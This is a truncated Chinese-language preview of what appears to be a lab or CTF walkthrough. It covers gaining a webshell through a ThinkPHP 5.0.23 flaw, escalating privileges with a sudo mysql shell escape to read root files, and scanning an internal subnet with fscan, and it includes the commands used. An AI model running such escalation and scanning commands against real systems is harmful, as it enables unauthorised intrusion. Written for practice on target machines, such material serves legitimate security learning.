文章预览
前言:本文中涉及到的技术,只提供思路,严禁用于违法测试 当然哦,还是用靶机吧,希望大家都保护好自己,哈哈哈 0x01 开启环境 0x02 web渗透 开启环境,访问web页面。 发现登录功能是个鸡肋,翻看别的功能点。 查看到这个熟悉的log,猜测可能存在框架漏洞。 使用漏洞利用工具进行探测。 发现存在thinkphp5.0.23漏洞,成功拿下webshell。 0x03 内网渗透 尝试suid提取,无结果。 find / -perm -u=s - type f 2 > /dev/ null 尝试sudo提取。 发现这个mysql是一个利用点。 https: / /gtfobins.github.io/ 查看提权命令 sudo mysql -e '\! find / -name flag*' sudo mysql -e '\! cat /root/flag/flag01.txt' 拿下flag1。 继续信息收集。 ip a 发现有一个内网网段,上传fscan,进行内网扫描。 ./fscan -h 172.22 . 1.0 / 24 >> 1 .txt 打开查看结果 172.22 . 1.18 : 135 open 172.22 . 1.21 : 135 open 172.22 . 1.2 : 135 open 172.22 . 1.18 :
………………………………
